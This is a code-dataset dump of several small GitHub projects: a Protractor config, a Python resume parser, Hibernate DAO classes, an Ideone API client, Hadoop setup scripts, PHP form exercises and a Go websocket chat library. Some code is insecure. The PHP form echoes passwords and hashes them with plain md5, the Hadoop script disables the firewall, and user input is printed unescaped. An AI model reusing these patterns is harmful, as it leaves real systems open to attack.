branch_name
stringclasses
149 values
text
stringlengths
23
89.3M
directory_id
stringlengths
40
40
languages
listlengths
1
19
num_files
int64
1
11.8k
repo_language
stringclasses
38 values
repo_name
stringlengths
6
114
revision_id
stringlengths
40
40
snapshot_id
stringlengths
40
40
refs/heads/master
<file_sep>var Jasmine2HtmlReporter = require('protractor-jasmine2-html-reporter'); var log4js = require('log4js'); var params = process.argv; var args = process.argv.slice(3); exports.config = { allScriptsTimeout: 100000, framework: 'jasmine2', directConnect: true, onPrepare: function () { browser.manage().timeouts().implicitlyWait(11000); var width = 768; var height = 1366; browser.driver.manage().window().setSize(768, 1366); browser.ignoreSynchronization = false; jasmine.getEnv().addReporter( new Jasmine2HtmlReporter({ savePath: __dirname+'/qualityreports/testresults/e2e', takeScreenshots: false, filePrefix: 'automationReport', consolidate: true, cleanDestination: false, consolidateAll: true }) ); }, suites:{ example:['./e2e/specs/**/*Spec.js',] }, capabilities: { 'browserName': 'chrome' }, resultJsonOutputFile:'./results.json', // Options to be passed to Jasmine-node. jasmineNodeOpts: { showColors: true, defaultTimeoutInterval: 100000 } };<file_sep># protractor-with-typeScript protractor-with-typeScript <file_sep>module.exports = { tests: 'e2e/**/*.spec.js', dist: "dist/", utils: "utils/*.js", distFiles: "dist/**/*.js" };<file_sep>import { ProtractorBrowser, Config } from 'protractor'; export let config: Config = { seleniumAddress: 'http://localhost:4444/wd/hub', capabilities: { 'browserName': 'chrome' }, framework: 'jasmine', specs: ['./specs/**/*.js'], jasmineNodeOpts: { defaultTimeoutInterval: 90000 }, onPrepare: () => { let globals = require('protractor'); let browser = globals.browser; browser.manage().window().maximize(); browser.manage().timeouts().implicitlyWait(5000); } }<file_sep>import { Config } from 'protractor'; export declare let config: Config; <file_sep>module.exports = function TakeScreenshot() { this.After(function (spec, callback) { if (spec.isFailed()) { browser.takeScreenshot().then(function (png) { var decodedImage = new Buffer(png.replace(/^data:image\/(png|gif|jpeg);base64,/,''), 'base64'); spec.attach(decodedImage, 'image/png'); 
callback(); }); } else { callback(); } }); }<file_sep>var gulp = require("gulp"); var gulpProtractor = require('gulp-protractor'); var protractor = require("gulp-protractor").protractor; var reporter = require("gulp-protractor-cucumber-html-report"); var params = process.argv; var args = process.argv.slice(3); var paths = require('../paths'); gulp.task("e2e", ["build"], function () { return gulp.src(paths.test) .pipe(protractor({ configFile: "protractor.conf.js", args: args })) .on("error", function (e) { throw e; }); }); gulp.task('webdriver-update', gulpProtractor.webdriver_update); gulp.task('webdriver-standalone', ['webdriver-update'], gulpProtractor.webdriver_standalone); gulp.task("e2e-report", function () { gulp.src(paths.testResultJson) .pipe(reporter({ dest: paths.e2eReports })); });
ec9fc669587df27ce2820fdad57780bc21daf42d
[ "JavaScript", "TypeScript", "Markdown" ]
7
JavaScript
tyaga001/protractor-with-typeScript
c4a6eaa983da91b5af50faa08abce208ae143a65
2f772f5fb2c1b2034380851eb365536dab65f46b
refs/heads/master
<file_sep>import re,nltk,docx2txt,csv,os,datetime # import textract - textract library works only for Linux (ubuntu) from nltk.corpus import stopwords from nltk.tokenize import word_tokenize ############################################################################ def extract_phone_numbers(string): #r = re.compile(r'(\d{3}[-\.\s]??\d{3}[-\.\s]??\d{4}|\(\d{3}\)\s*\d{3}[-\.\s]??\d{4}|\d{3}[-\.\s]??\d{4})') mobile = "" match_mobile = re.search(r'((?:\(?\+91\)?)?\d{10})',string) #phone_numbers = r.findall(string) #return [re.sub(r'\D', '', number) for number in phone_numbers] if(match_mobile != None): mobile = match_mobile.group(0) return mobile ################################################################################### def extract_email_addresses(string): r = re.compile(r'[\w\.-]+@[\w\.-]+') return r.findall(string) ################################################################################# def extract_names(document): nouns = [] #empty to array to hold all nouns stop = stopwords.words('english') stop.append("Resume") stop.append("RESUME") document = ' '.join([i for i in document.split() if i not in stop]) sentences = nltk.sent_tokenize(document) for sentence in sentences: for word,pos in nltk.pos_tag(nltk.word_tokenize(str(sentence))): if (pos == 'NNP' and len(word)>2): nouns.append(word) nouns=' '.join(map(str,nouns)) nouns=nouns.split() return nouns ############################################################################## ##encode("utf-8", "replace") def modification_date(filename): t = os.path.getmtime(filename) return datetime.datetime.fromtimestamp(t) ########################################################### def generate_ngrams(filename, n): words = filename.split() output = [] for i in range(len(words)-n+1): output.append(words[i:i+n]) f=[] for i in output: if 'years' in i: f.append(output[output.index(i)]) if len(f)==1: n=f[0][0] n=n + " " + "years" break if len(f)<1: n='Not specified' return n 
############################################################
def get_convert_to_text(filename):
    """
    Extract resume details from a .docx or .pdf file.

    Returns a dict with keys: Name, Mob no, Email, Resume,
    Number of exp, Last Modified, Skills Set.
    """
    if filename.endswith(".docx"):
        fullText = docx2txt.process(filename)
    elif filename.endswith(".pdf"):
        # textract only works on Linux, so import it lazily here; it was
        # previously referenced without ever being imported, which made
        # every .pdf raise NameError.
        import textract
        fullText = str(textract.process(filename))
        fullText = fullText.replace("\\n", " ")
    else:
        print("File format is currently not supported")
        exit(0)

    details = []
    ab = []
    a = []
    name_coll = extract_names(fullText)
    fullText = fullText.replace('b"', "")
    stop = stopwords.words('english')
    stop.append("Resume")
    stop.append("RESUME")
    abc = fullText.split()
    b = extract_phone_numbers(fullText)
    c = set(extract_email_addresses(fullText))
    e = modification_date(filename)

    # Try to read the experience ("x years y months") out of the file name.
    mi = filename.lower()
    h = mi.replace("_", " ")
    h = h.replace("-", " ")
    h = h.replace(",", " ")
    h = h.replace(".docx", " ")
    h = h.replace(".pdf", " ")
    h = h.split()
    if 'years' in h and 'months' in h:
        d = h[h.index('years') - 1] + " " + h[h.index('years')] + " " + h[h.index('months') - 1] + " " + h[h.index('months')]
    elif 'years' in h:
        d = h[h.index('years') - 1] + " " + h[h.index('years')]
    elif 'months' in h:
        d = h[h.index('months') - 1] + " " + h[h.index('months')]
    elif re.search('no experience', str(h), re.M | re.I):
        d = 'No Experience'
    else:
        # Fall back to scanning the document text itself.
        d = generate_ngrams(fullText, 2)

    # Keep the first proper noun that also appears in the e-mail address
    # or the file name -- assumed to be the candidate's name.
    for i in name_coll:
        # re.escape: the tokens are plain words, not regex patterns, and
        # characters like '+' or '(' used to raise re.error here.
        if re.search(re.escape(i), str(c), re.M | re.I) or re.search(re.escape(i), filename, re.M | re.I):
            ab.append(i)
        if len(ab) == 1:
            break

    # NOTE(review): hard-coded, machine-specific path -- make configurable.
    with open("/home/palak/Documents/Filter Profile/Resumes/all_linked_skills.txt", "r") as skill:
        skill_set = skill.read().split("\n")
    f = []
    for s in skill_set:
        if s in fullText:
            if len(s) > 2:
                f.append(s)

    if ab and ab[0] in abc and abc.index(ab[0]) + 1 < len(abc):
        # Name = the matched token plus the word that follows it.
        a = abc[abc.index(ab[0])] + " " + abc[abc.index(ab[0]) + 1]
    else:
        # Previously this indexed ab[0] unconditionally and crashed with
        # IndexError whenever no name token matched.
        a = "Unknown"
    c = " ".join(str(x) for x in c)
    details = {'Name': a, 'Mob no': b, 'Email': c, 'Resume': filename, 'Number of exp': d, 'Last Modified': e, 'Skills Set': f}
    return (details)
####################################################################
### MAIN Program ###
if __name__ == '__main__':
    # Walk the working directory tree and parse every .docx / .pdf resume.
    output = []
    for root, dirs, files in os.walk("."):
        for file in files:
            if file.endswith(".docx") or file.endswith(".pdf"):
                # Join with `root`: the bare file name only opened correctly
                # for files sitting in the current directory, so any resume
                # in a subdirectory crashed the run.
                output.append(get_convert_to_text(os.path.join(root, file)))

    # newline='' stops the csv module inserting blank rows on Windows.
    with open('names.csv', 'w', newline='') as csvfile:
        fieldnames = ['Name', 'Mob no', 'Email', 'Resume', 'Number of exp', 'Last Modified', 'Skills Set']
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        for row in output:
            writer.writerow(row)

    print()
    print("########Resume Filter############")
    print("Please check the CSV file , Data loaded into it ")
491fefd4e3dcbbbec2a97719d6839060c90098f8
[ "Python" ]
1
Python
rishiraj08/Resume_Parsing
14c755d676cc18ba7a58384b2d0f35bcb5902670
68dbf009ad51bbbcb6cc89c1afd36b55440281f0
refs/heads/master
<file_sep>/* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ package sys.bean; import java.util.List; import javax.inject.Named; import javax.faces.view.ViewScoped; import sys.dao.EstudiantesDAO; import sys.dao.EstudiantesDAOimp; import sys.model.Estudiantes; @Named(value = "estudiantesBean") @ViewScoped public class EstudiantesBean { private List<Estudiantes> listar; private Estudiantes estudiante; public EstudiantesBean() { } public Estudiantes getEstudiante() { return estudiante; } public void setEstudiante(Estudiantes estudiante) { this.estudiante = estudiante; } public List<Estudiantes> getListar() { EstudiantesDAO edao = new EstudiantesDAOimp(); listar = edao.mostrar(); return listar; } public void nuevoestudiante(){ EstudiantesDAO edao = new EstudiantesDAOimp(); edao.nuevoestudiante(estudiante); estudiante = new Estudiantes(); } }<file_sep># PruebaTecnica Requerimientos Java 1.8 JDK 8.X Oracle Express 11g IDE Se uso la version de netbeans_2019-06 <file_sep>package sys.model; // Generated 9/08/2019 09:14:19 AM by Hibernate Tools 4.3.1 /** * Estudiantes generated by hbm2java */ public class Estudiantes implements java.io.Serializable { private short idEstudiante; private String nombre; private String apellido; public Estudiantes() { } public Estudiantes(short idEstudiante) { this.idEstudiante = idEstudiante; } public Estudiantes(short idEstudiante, String nombre, String apellido) { this.idEstudiante = idEstudiante; this.nombre = nombre; this.apellido = apellido; } public short getIdEstudiante() { return this.idEstudiante; } public void setIdEstudiante(short idEstudiante) { this.idEstudiante = idEstudiante; } public String getNombre() { return this.nombre; } public void setNombre(String nombre) { this.nombre = nombre; } public String getApellido() { return this.apellido; } public void setApellido(String apellido) { this.apellido = 
apellido; } } <file_sep>/* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ package sys.dao; import java.util.List; import org.hibernate.HibernateException; import org.hibernate.Session; import org.hibernate.Transaction; import sys.model.Estudiantes; import sys.util.HibernateUtil; /** * * @author santi */ public class EstudiantesDAOimp implements EstudiantesDAO{ @Override public List<Estudiantes> mostrar() { List<Estudiantes> listar = null; Session session = HibernateUtil.getSessionFactory().openSession(); Transaction transaction = session.beginTransaction(); String hql="FROM Estudiantes"; try{ listar = session.createQuery(hql).list(); transaction.commit(); session.close(); } catch (HibernateException e){ System.out.println(e.getMessage()); transaction.rollback(); } return listar; } @Override public void nuevoestudiante(Estudiantes estudiante) { Session session = null; try{ session = HibernateUtil.getSessionFactory().openSession(); session.beginTransaction(); session.save(estudiante); session.getTransaction().commit(); } catch(HibernateException e){ System.out.println(e.getMessage()); session.getTransaction().rollback(); } finally{ if(session!=null){ session.close(); } } } }
4e1f359412c71729c08122287d6aacdbd7c6bf12
[ "Markdown", "Java" ]
4
Java
joelvargas9528/PruebaTecnica
efab16212c34a0bb2694202034d99357786a2205
de06254d2c62e6229ea0f44c2c6074e39023de3c
refs/heads/master
<repo_name>Codepanion/codepanion-ideone-api<file_sep>/README.md # codepanion-ideone-api ##Points to Consider : 1. Ideone API responds with an array of keys and value. Utilising that in python becomes difficult . Hence, we require a method to convert it to a python dictionary . That has been implemented . 2. Your username and password are the ones you create when you register yourself as a developer . Normal user ones won't cut it . 3. Script provided in Node.js, Python and PHP . Although, Codepanion utilises it in Python. 4. Conversion to a native dictionary is not required in PHP and Node.js. 5. Node.js implementation returns values in JSON format . ##Dependencies : 1. Python : Any Web framework for implementation + [SOAPpy](https://github.com/kiorky/SOAPpy) . 2. Javascript : Node.js + [jsonrpc protocol](http://www.jsonrpc.org/) . <file_sep>/ideone-api-python.py from SOAPpy import WSDL from time import sleep def transform_to_dict(result): result_dict = {} property_list = result.item for item in property_list: result_dict[item.key] = item.value return result_dict def print_dict(sample_dict): return str(sample_dict.values()) def calling(): username = 'rgbimbochamp' password = '<PASSWORD>' language = 1 code = """#include<stdio.h> int main() { int i ; scanf("%d",&i); i = i * 2 ; printf("%d",i); return 0; }""" testcases = '34' run = True private = False client = WSDL.Proxy('http://ideone.com/api/1/service.wsdl') result_nondict = client.createSubmission( username, password, code, language, testcases, run, private ) result = transform_to_dict(result_nondict) if(result['error'] == 'OK'): status_nondict = client.getSubmissionStatus(username, password, result['link']) status = transform_to_dict(status_nondict) if(status["error"] == 'OK'): while(status['status'] != 0): sleep(3) status_nondict = client.getSubmissionStatus(username,password,result['link']) status = transform_to_dict(status_nondict) details_nondict = 
client.getSubmissionDetails(username,password,result['link'],True,True,True,True,True) details = transform_to_dict(details_nondict) if(details["error"] == 'OK'): return print_dict(details) else: return print_dict(details) else: return print_dict(status) else: return print_dict(result)
b48591a16f2d6671d37769be933f4fd6a88daa51
[ "Markdown", "Python" ]
2
Markdown
Codepanion/codepanion-ideone-api
420cef78fd103f65f12962e300c743321fc6b857
86f94ca947de5dd486c631610ee8ced939a2403d
refs/heads/master
<file_sep>echo "stoping hadoop-slave1 container..." sudo docker stop hadoop-slave1 echo "stoping hadoop-slave2 container..." sudo docker stop hadoop-slave2 echo "stoping hadoop-master container..." sudo docker stop hadoop-master <file_sep>#!/bin/bash # the default node number is 3 N=${1:-3} sudo docker network create --subnet=172.18.0.0/16 hadoop &> /dev/null # start hadoop master container sudo docker rm -f hadoop-master &> /dev/null echo "start hadoop-master container..." sudo docker run -itd \ --net=hadoop \ --ip 172.18.0.2 \ -p 50070:50070 \ -p 8088:8088 \ --name hadoop-master \ --hostname hadoop-master \ kiwenlau/hadoop:1.0 # start hadoop slave container i=1 while [ $i -lt $N ] do j=$(( $i + 2 )) sudo docker rm -f hadoop-slave$i &> /dev/null echo "start hadoop-slave$i container..." sudo docker run -itd \ --net=hadoop \ --ip 172.18.0.$j \ --name hadoop-slave$i \ --hostname hadoop-slave$i \ kiwenlau/hadoop:1.0 i=$(( $i + 1 )) done # start hadoop in container echo "starting hadoop ...." sudo docker exec -it "hadoop-master" /bin/sh /root/start-hadoop.sh <file_sep># HaoopQuickStart 快速搭建hadoop,提供Centos(7.6版本最优)及docker两种方式 # 声明 - 本项目中大部分脚本是在KiwenLau(<EMAIL>)大神的《基于Docker搭建Hadoop集群之升级版》上的项目修改及优化而成 - 详见:https://kiwenlau.com/2016/06/12/160612-hadoop-cluster-docker-update/ # 改动概述 - 修改了源项目中的Dockerfile: 1. 更换了sources.list(使用了国内源),使镜像建立速度更快; - 修改了源项目中的容器run脚本: 1. 添加了:run前先建立hadoop的network(centos执行脚本会时提示不存在名为hadoop的network...) 2. 更改了:使用了静态ip 3. 添加了:容器建立成功后马上执行hadoop启动脚本 - 修改了start-hadoop.sh: 1. 添加了:启动historyserver,更加方便查看已完成的Appliction历史情况 - 修改了yarn.xml: 1. 添加了yarn.log-aggregation-enable属性,更方便hadoop保存已完成任务的日志到hdfs - 添加了一些更方便的脚本,如重启、关停hadoop脚本 - 修改了mapred-site.xml: 1. 添加了任务完成回调属性等 # 其他 - 详见hadoop_for_centos7.6及hadoop_for_docker下README.md - 或联系 <EMAIL> <file_sep>echo "starting hadoop-master container..." sudo docker start hadoop-master echo "starting hadoop-slave1 container..." sudo docker start hadoop-slave1 echo "starting hadoop-slave2 container..." 
sudo docker start hadoop-slave2 echo "starting hadoop ...." sudo docker exec -it "hadoop-master" /bin/sh /root/start-hadoop.sh<file_sep>#!/bin/bash set -e current_path=`pwd` echo "shutdown the fire wall" #¹Ø±Õ·À»ðǽ systemctl stop firewalld systemctl disable firewalld echo "building java ..." tar -xzvf $current_path/jdk-8u201-linux-x64.tar.gz -C ~/ mv ~/jdk1.8.0_201 /usr/local/jdk1.8.0_201 echo "JAVA_HOME=/usr/local/jdk1.8.0_201" >> /etc/profile echo "JRE_HOME=\$JAVA_HOME/jre" >> /etc/profile echo "CLASS_PATH=.:\$JAVA_HOME/lib/dt.jar:\$JAVA_HOME/lib/tools.jar:\$JRE_HOME/lib" >> /etc/profile echo "PATH=\$PATH:\$JAVA_HOME/bin:\$JRE_HOME/bin" >> /etc/profile source /etc/profile mkdir /usr/lib/jvm ln -s $JAVA_HOME /usr/lib/jvm/java-7-openjdk-amd64 echo "ready to build hadoop ..." yum install wget -y wget https://github.com/kiwenlau/compile-hadoop/releases/download/2.7.2/hadoop-2.7.2.tar.gz tar -xzvf hadoop-2.7.2.tar.gz && \ mv hadoop-2.7.2 /usr/local/hadoop && \ rm hadoop-2.7.2.tar.gz echo "building hadoop path ..." 
echo "HADOOP_HOME=/usr/local/hadoop" >> /etc/profile echo "PATH=\$PATH:/usr/local/hadoop/bin:/usr/local/hadoop/sbin" >> /etc/profile source /etc/profile mkdir -p ~/hdfs/namenode && \ mkdir -p ~/hdfs/datanode && \ mkdir $HADOOP_HOME/logs config_path="$current_path/../config" \cp $config_path/ssh_config ~/.ssh/config && \ \cp $config_path/hadoop-env.2.0.sh /usr/local/hadoop/etc/hadoop/hadoop-env.sh && \ \cp $config_path/hdfs-site.xml $HADOOP_HOME/etc/hadoop/hdfs-site.xml && \ \cp $config_path/core-site.xml $HADOOP_HOME/etc/hadoop/core-site.xml && \ \cp $config_path/mapred-site.xml $HADOOP_HOME/etc/hadoop/mapred-site.xml && \ \cp $config_path/yarn-site.xml $HADOOP_HOME/etc/hadoop/yarn-site.xml && \ \cp $config_path/slaves $HADOOP_HOME/etc/hadoop/slaves && \ \cp $config_path/start-hadoop.sh ~/start-hadoop.sh && \ \cp $config_path/stop-hadoop.sh ~/stop-hadoop.sh && \ \cp $config_path/restart-hadoop.sh ~/restart-hadoop.sh && \ \cp $config_path/run-wordcount.sh ~/run-wordcount.sh chmod +x ~/start-hadoop.sh && \ chmod +x ~/stop-hadoop.sh && \ chmod +x ~/restart-hadoop.sh && \ chmod +x ~/run-wordcount.sh && \ chmod +x $HADOOP_HOME/sbin/start-dfs.sh && \ chmod +x $HADOOP_HOME/sbin/start-yarn.sh # format namenode $HADOOP_HOME/bin/hdfs namenode -format echo "hadoop build success!"<file_sep># HaoopQuickStart for hadoop - 运行方式: 1. 配置好各个节点之间的ssh免密登录,略 2. 配置好各个节点的hosts文件,至少需要配置的节点:hadoop-master + hadoop-slave1 + hadoop-slave2, 略 3. 
在各个节点的服务器上运行:**source** build-hadoop.sh # 声明 - 本项目中大部分脚本是在KiwenLau(<EMAIL>)大神的《基于Docker搭建Hadoop集群之升级版》上的项目修改及优化而成 - 详见:https://kiwenlau.com/2016/06/12/160612-hadoop-cluster-docker-update/ # 改动概述 - 将源项目的Dockerfile修改为适合centos7的build-hadoop.sh - 添加了update-config.sh,更加方便快速更新配置文件到各个节点使用方法: **source** update-config.sh hadoop-master hadoop-slave1 hadoop-slave2 ...<file_sep># HaoopQuickStart for hadoop 运行方式:sh build-hadoop-image.sh # 声明 - 本项目中大部分脚本是在KiwenLau(<EMAIL>)大神的《基于Docker搭建Hadoop集群之升级版》上的项目修改及优化而成 - 详见:https://kiwenlau.com/2016/06/12/160612-hadoop-cluster-docker-update/ # 改动概述 - 修改了源项目中的Dockerfile: 1. 更换了sources.list(使用了国内源),使镜像建立速度更快; - 修改了源项目中的容器run脚本: 1. 添加了:run前先建立hadoop的network(centos执行脚本会时提示不存在名为hadoop的network...) 2. 更改了:使用了静态ip 3. 添加了:容器建立成功后马上执行hadoop启动脚本 - 修改了start-hadoop.sh: 1. 添加了:启动historyserver,更加方便查看已完成的Appliction历史情况<file_sep>#!/bin/bash set -e echo -e "\n" sh $HADOOP_HOME/sbin/stop-yarn.sh echo -e "\n" sh $HADOOP_HOME/sbin/stop-dfs.sh echo -e "\n" sh $HADOOP_HOME/sbin/start-dfs.sh echo -e "\n" sh $HADOOP_HOME/sbin/start-yarn.sh echo -e "\n"<file_sep>#!/bin/bash set -e echo -e "\n" sh $HADOOP_HOME/sbin/stop-yarn.sh echo -e "\n" sh $HADOOP_HOME/sbin/stop-dfs.sh echo -e "\n" sh $HADOOP_HOME/sbin/mr-jobhistory-daemon.sh stop historyserver echo -e "\n"
e95567dd086da0e568e150201b8121787ec2f91d
[ "Markdown", "Shell" ]
9
Shell
cyx2706/HaoopQuickStart
f0b983d46a64987aedaa469cff741483ca982692
e095626a40f0168cbb6b1347c11a541c126e664b
refs/heads/master
<repo_name>Alcvetkov/Homework-PHPWeb<file_sep>/Task2.php
<?php
// Return $array[$key] when it exists, $default otherwise.
function get_value($array, $key, $default = null)
{
    return isset($array[$key]) ? $array[$key] : $default;
}

$user = get_value($_POST, 'user');
$pass = get_value($_POST, 'pass');
$rePass = get_value($_POST, 'rPass');

$result = "";
$isCorrect = false;
// Removed the debug `echo $user . ' ' . $pass;` -- it leaked the plain-text
// password and emitted output before the doctype.
if ($pass == $rePass) {
    $isCorrect = true;
    // NOTE(review): md5 is not a password hash; prefer password_hash().
    $result = md5($pass);
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Insert title here</title>
<style>
label { display: block; }
</style>
</head>
<body>
<div>
<form action="" method="post">
<div>
<label for="user">User name:</label>
<input type="text" name="user"/>
</div>
<div>
<label for="pass">Password:</label>
<input type="password" name="pass"/>
</div>
<div>
<label for="rPass">Repeat password:</label>
<input type="password" name="rPass"/>
</div>
<div>
<button type="submit" >Register</button>
</div>
</form>
</div>
<?php if (isset($pass) && isset($rePass)) : ?>
<?php if ($isCorrect) : ?>
<!-- htmlspecialchars: the user name comes straight from POST (XSS). -->
<p>The user name is <strong><?= htmlspecialchars($user) ?></strong> and the password is <strong><?= $result ?></strong>.</p>
<?php else : ?>
<p>The password and the repeated password are not the same.</p>
<?php endif; ?>
<?php endif; ?>
</body>
</html><file_sep>/Task3.php
<?php
// Return $array[$key] when it exists, $default otherwise.
function get_value($array, $key, $default = null)
{
    return isset($array[$key]) ? $array[$key] : $default;
}

$number = get_value($_POST, 'number');
$convertGradus = get_value($_POST, 'gradus');

$result = 0;
if ($convertGradus == "CtoF") {
    $result = (9 / 5) * $number + 32;
} else if ($convertGradus == "FtoC") {
    $result = (5 / 9) * ($number - 32);
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Gradus Calculator</title>
</head>
<body>
<div>
<form action="" method="post">
<div>
<input type="text" name="number"/>
<select name="gradus" id="gradus">
<option value="CtoF">Celsius to Fahrenheit</option>
<option value="FtoC">Fahrenheit to Celsius</option>
</select>
</div>
<div>
<button type="submit" >Calculate</button>
</div>
</form>
</div>
<?php if (isset($number)) : ?>
<p>The result is <?= $result ?>.</p>
<?php endif; ?>
</body>
</html><file_sep>/Task1.php
<?php
// Return $array[$key] when it exists, $default otherwise.
function get_value($array, $key, $default = null)
{
    return isset($array[$key]) ? $array[$key] : $default;
}

$firstNumber = get_value($_POST, 'firstNumber');
$secondNumber = get_value($_POST, 'secondNumber');
$calculateSymbol = get_value($_POST, 'calc');

$result = 0;
if ($calculateSymbol == "+") {
    $result = $firstNumber + $secondNumber;
} else if ($calculateSymbol == "-") {
    $result = $firstNumber - $secondNumber;
} else if ($calculateSymbol == "*") {
    $result = $firstNumber * $secondNumber;
} else if ($calculateSymbol == "/") {
    if ($secondNumber != 0) {
        $result = $firstNumber / $secondNumber;
    }
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Calculator</title>
</head>
<body>
<div>
<form action="" method="post">
<div>
<input type="text" name="firstNumber"/>
<input type="text" name="secondNumber"/>
<select name="calc" id="calculate">
<option value="+">+</option>
<option value="-">-</option>
<option value="*">*</option>
<option value="/">/</option>
</select>
</div>
<div>
<button type="submit" >Calculate</button>
</div>
</form>
</div>
<?php if (isset($firstNumber) && isset($secondNumber)) : ?>
<?php /* Only division by zero is an error; the original showed this
         message for +, - and * whenever the second operand was 0. */ ?>
<?php if ($calculateSymbol == "/" && $secondNumber == 0) : ?>
<p>Can't divide by 0.</p>
<?php else : ?>
<p>The result of <?= htmlspecialchars($firstNumber) . " " . htmlspecialchars($calculateSymbol) . " " . htmlspecialchars($secondNumber) . " = " . $result ?></p>
<?php endif; ?>
<?php endif; ?>
</body>
</html>
de153b61f227f7efbabe316f05c9f53a9d0e13d7
[ "PHP" ]
3
PHP
Alcvetkov/Homework-PHPWeb
7b62bc7994f1ec8cb23d43569dbca6ccfcbb2efb
8de7deab4c461b5fae8ec370d5764e1096cf661d
refs/heads/master
<repo_name>NameLessCorporation/live-chat-lib<file_sep>/models/rooms.go package models import "github.com/NameLessCorporation/live-chat-lib/hub" // Rooms ... type Rooms struct { Rooms []*Room } // NewRooms ... func NewRooms() *Rooms { return &Rooms{ Rooms: nil, } } // Create ... func (rooms *Rooms) Create(room *Room) { h := hub.NewHub() go h.Run() room.Hub = h rooms.Rooms = append(rooms.Rooms, room) } // Delete ... func (rooms *Rooms) Delete(room *Room) { for i, r := range rooms.Rooms { if r.Token == room.Token { for _, c := range room.Clients { c.Connection.Close() } copy(rooms.Rooms[i:], rooms.Rooms[i+1:]) rooms.Rooms[len(rooms.Rooms)-1] = nil rooms.Rooms = rooms.Rooms[:len(rooms.Rooms)-1] } } } <file_sep>/models/room.go package models import ( "bytes" "fmt" "github.com/NameLessCorporation/live-chat-lib/hub" "github.com/gorilla/websocket" ) const ( maxMessageSize = 1024 ) // Room ... type Room struct { Name string `name:"json"` Token string `name:"json"` Clients []*hub.Client Hub *hub.Hub } // Writer ... func (room *Room) Writer(client *hub.Client) error { defer func() { client.Connection.Close() }() for { data, ok := <-client.Send if !ok { client.Connection.WriteMessage(websocket.CloseMessage, []byte{}) return nil } client.Connection.WriteMessage(1, data) } } // Reader ... 
func (room *Room) Reader(client *hub.Client) error { defer func() { room.Hub.Unregister <- client client.Connection.Close() }() client.Connection.SetReadLimit(maxMessageSize) for _, c := range room.Clients { if client == c { for { _, mess, err := client.Connection.ReadMessage() if err != nil { return err } data := []byte(fmt.Sprintf("%s: %s\n", client.ClientInfo.Name, string(mess))) for _, b := range data { room.Hub.Buffer = append(room.Hub.Buffer, b) } data = bytes.TrimSpace(bytes.Replace(data, []byte("\n"), []byte(" "), -1)) room.Hub.Broadcast <- data } } } return nil } <file_sep>/go.mod module github.com/NameLessCorporation/live-chat-lib go 1.15 require ( github.com/gorilla/websocket v1.4.2 github.com/sqs/goreturns v0.0.0-20181028201513-538ac6014518 // indirect ) <file_sep>/hub/client.go package hub import ( "github.com/gorilla/websocket" ) // Client ... type Client struct { Connection *websocket.Conn Send chan []byte ClientInfo *ClientInfo } // ClientInfo ... type ClientInfo struct { Name string `json:"name"` Email string `json:"email"` Token string `json:"token"` } <file_sep>/test/main.go package main import ( "encoding/json" "io/ioutil" "log" "net/http" "github.com/NameLessCorporation/live-chat-lib/hub" "github.com/NameLessCorporation/live-chat-lib/models" websocket "github.com/NameLessCorporation/live-chat-lib/websocket" ) func main() { handler() http.ListenAndServe(":8080", nil) } func handler() { rooms := models.NewRooms() // var ClientsQueue []*hub.ClientInfo var clientInfo hub.ClientInfo http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { http.ServeFile(w, r, "index.html") }) http.HandleFunc("/chat", func(w http.ResponseWriter, r *http.Request) { ws := websocket.NewWebSocket(w, r) ws.ConnectionWebSocket(&clientInfo, rooms) }) http.HandleFunc("/create", func(w http.ResponseWriter, r *http.Request) { type Request struct { Name string `json:"name"` Token string `json:"token"` } var req Request body, err := ioutil.ReadAll(r.Body) if err != 
nil { log.Println("Request error: ", err) } json.Unmarshal(body, &req) room := &models.Room{ Name: req.Name, Token: req.Token, Clients: nil, Hub: nil, } rooms.Create(room) }) http.HandleFunc("/delete", func(w http.ResponseWriter, r *http.Request) { type Request struct { Token string `json:"token"` } var req Request body, err := ioutil.ReadAll(r.Body) if err != nil { log.Println("Request error: ", err) } json.Unmarshal(body, &req) room := &models.Room{ Token: req.Token, } rooms.Delete(room) }) http.HandleFunc("/join", func(w http.ResponseWriter, r *http.Request) { body, err := ioutil.ReadAll(r.Body) if err != nil { log.Println("Request error: ", err) } json.Unmarshal(body, &clientInfo) }) } <file_sep>/test/go.mod module packages go 1.14 require github.com/NameLessCorporation/live-chat-lib v0.0.0-20200830204505-c00cd0c70ada // indirect <file_sep>/websocket/websocket.go package websoket import ( "log" "net/http" "github.com/NameLessCorporation/live-chat-lib/hub" "github.com/NameLessCorporation/live-chat-lib/models" "github.com/gorilla/websocket" ) // WebSocket ... type WebSocket struct { Upgrader *websocket.Upgrader Response http.ResponseWriter Request *http.Request } var upgrader = websocket.Upgrader{ ReadBufferSize: 1024, WriteBufferSize: 1024, } // NewWebSocket ... func NewWebSocket(w http.ResponseWriter, r *http.Request) *WebSocket { return &WebSocket{ Upgrader: &upgrader, Response: w, Request: r, } } // ConnectionWebSocket ... 
func (ws *WebSocket) ConnectionWebSocket(clientInfo *hub.ClientInfo, rooms *models.Rooms) error { for _, room := range rooms.Rooms { if room.Token == clientInfo.Token { conn, err := ws.Upgrader.Upgrade(ws.Response, ws.Request, nil) if err != nil { return err } client := &hub.Client{ Connection: conn, Send: make(chan []byte, 1024), ClientInfo: &hub.ClientInfo{ Name: clientInfo.Name, Email: clientInfo.Email, Token: clientInfo.Token, }, } room.Hub.Register <- client room.Clients = append(room.Clients, client) client.Connection.WriteMessage(1, room.Hub.Buffer) for _, c := range room.Clients { log.Println(c.ClientInfo.Name) } go room.Writer(client) go room.Reader(client) } } return nil } <file_sep>/README.md # live-chat-lib
f7d6a1753e8704f39ec462d14f099a0b578cfae3
[ "Markdown", "Go Module", "Go" ]
8
Go
NameLessCorporation/live-chat-lib
d6aed125e872d2ade4c56b3be658bd34c1a72f18
ea35d962e2bfdd6408c0924a533bbcc70f33d1bd
refs/heads/master
